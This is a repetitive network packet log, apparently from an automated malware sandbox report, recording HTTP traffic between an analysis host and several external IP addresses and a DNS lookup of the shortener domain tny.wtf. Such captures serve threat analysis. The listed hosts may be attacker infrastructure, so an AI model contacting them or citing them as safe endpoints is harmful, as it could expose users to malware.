                Jul 26, 2024 08:24:51.905941963 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.905946970 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.905970097 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.906357050 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906368017 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906378031 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906399012 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906409025 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906409979 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.906420946 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906433105 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906436920 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.906456947 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.906771898 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906785965 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906795979 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906807899 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906819105 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906821966 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.906831026 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906841993 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906842947 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.906852961 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.906866074 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.906893015 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.907272100 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.907283068 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.907294035 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.907305002 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.907315016 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.907320976 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.907325983 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.907336950 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.907345057 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.907347918 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.907360077 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.907371044 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.907372952 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.907382965 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.907392979 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.907397032 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.907469988 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.907809019 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.907823086 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.907869101 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.950687885 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.950722933 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.950730085 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.950736046 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.950748920 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.950759888 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.950772047 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.950798035 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.950833082 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.993705988 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.993732929 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.993745089 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.993756056 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.993767023 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.993777990 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.993792057 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.993803978 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.993838072 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.994031906 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994043112 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994054079 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994066000 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994076014 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994081974 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.994087934 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994098902 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994102001 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.994108915 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994122028 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994123936 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.994165897 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.994499922 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994510889 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994519949 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994530916 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994541883 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994546890 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.994573116 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.994735956 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994746923 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994756937 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994767904 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994777918 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994782925 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.994787931 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.994805098 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.995160103 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.995171070 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.995181084 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.995191097 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.995201111 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.995212078 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.995217085 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.995217085 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.995222092 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.995233059 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.995244026 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.995254040 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.995265007 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.995265961 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.995276928 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.995282888 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.995326042 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:51.995666981 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.995678902 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:51.995719910 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.000327110 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000344992 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000355959 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000394106 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.000505924 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000518084 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000528097 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000539064 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000550032 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000554085 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.000583887 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.000720978 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000732899 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000742912 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000755072 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000772953 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.000802994 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.000880003 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000890970 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000900984 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000911951 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.000941038 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.000941038 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.001009941 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001020908 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001059055 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.001127958 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001138926 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001148939 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001161098 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001171112 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001174927 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.001182079 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001194000 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001204014 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.001240969 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.001488924 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001571894 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001584053 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001594067 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001605034 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001615047 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001626015 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.001655102 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.001729965 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001740932 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001750946 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001761913 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001771927 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001771927 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.001782894 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001796007 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.001799107 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001820087 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.001939058 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001955986 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.001986027 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.002021074 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002032042 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002043009 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002065897 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.002218962 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002229929 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002238989 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002249956 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002260923 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002263069 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.002271891 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002283096 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002295017 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.002317905 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.002475977 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002485037 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002523899 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.002568007 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002644062 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002654076 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002685070 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.002770901 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002921104 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002933025 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.002963066 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.003001928 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.003012896 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.003022909 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.003034115 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.003048897 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.003077030 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.003160954 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.046135902 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.046154022 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.046174049 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.046185017 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.046195984 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.046209097 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.046242952 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.046253920 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.046253920 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.046284914 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.052031040 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.088927031 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.088960886 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.088973045 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089006901 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.089019060 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089030981 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089067936 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.089133024 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089144945 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089174032 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.089283943 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089296103 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089308023 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089319944 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089324951 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.089330912 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089353085 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.089524031 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089534998 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089551926 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089561939 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089566946 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.089572906 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089581966 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089591980 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.089612007 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.089870930 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089883089 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089895010 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089905977 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089910030 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.089916945 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089927912 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.089936018 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.089960098 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.090128899 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090148926 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090195894 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.090229988 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090240955 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090265989 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.090421915 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090434074 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090444088 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090455055 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090461016 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.090466022 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090487957 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.090759039 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090770006 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090780020 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090791941 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090801001 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.090802908 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090812922 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090822935 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090823889 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.090832949 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090840101 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.090845108 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.090862036 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.096004963 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096040964 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096055984 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.096060991 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096115112 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.096117020 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096162081 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096173048 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096195936 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.096380949 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096429110 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.096432924 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096446037 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096457005 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096468925 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096491098 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.096508980 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.096594095 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096606016 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096616030 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096631050 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.096837044 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096848011 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096858978 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096869946 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096873999 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.096887112 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096898079 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.096903086 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.096924067 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.097153902 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097166061 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097176075 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097187042 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097193003 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.097201109 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097212076 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097219944 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.097223043 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097234011 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097240925 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.097269058 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.097697020 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097709894 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097721100 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097732067 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097738028 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.097742081 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097753048 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097760916 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.097764015 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097781897 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.097932100 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097943068 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097953081 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097964048 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097971916 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.097982883 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.097992897 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.097994089 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.098005056 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.098016977 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.098242044 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.098253965 CEST8049172192.227.225.166192.168.2.22
                Jul 26, 2024 08:24:52.098284960 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.190679073 CEST4917280192.168.2.22192.227.225.166
                Jul 26, 2024 08:24:52.191370010 CEST4917180192.168.2.22198.46.176.133
                Jul 26, 2024 08:25:36.400923014 CEST4916780192.168.2.22188.114.97.3
                Jul 26, 2024 08:25:36.401015043 CEST4916880192.168.2.22188.114.97.3
                TimestampSource PortDest PortSource IPDest IP
                Jul 26, 2024 08:24:34.530459881 CEST5456253192.168.2.228.8.8.8
                Jul 26, 2024 08:24:34.541492939 CEST53545628.8.8.8192.168.2.22
                Jul 26, 2024 08:24:36.750919104 CEST5291753192.168.2.228.8.8.8
                Jul 26, 2024 08:24:36.760668039 CEST53529178.8.8.8192.168.2.22
                Jul 26, 2024 08:24:38.537373066 CEST6275153192.168.2.228.8.8.8
                Jul 26, 2024 08:24:38.548377037 CEST53627518.8.8.8192.168.2.22
                Jul 26, 2024 08:24:38.550374985 CEST5789353192.168.2.228.8.8.8
                Jul 26, 2024 08:24:38.561120987 CEST53578938.8.8.8192.168.2.22
                Jul 26, 2024 08:24:42.380235910 CEST5482153192.168.2.228.8.8.8
                Jul 26, 2024 08:24:42.391953945 CEST53548218.8.8.8192.168.2.22
                Jul 26, 2024 08:24:42.393402100 CEST5471953192.168.2.228.8.8.8
                Jul 26, 2024 08:24:42.407871962 CEST53547198.8.8.8192.168.2.22
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jul 26, 2024 08:24:34.530459881 CEST192.168.2.228.8.8.80x7fcaStandard query (0)tny.wtfA (IP address)IN (0x0001)false
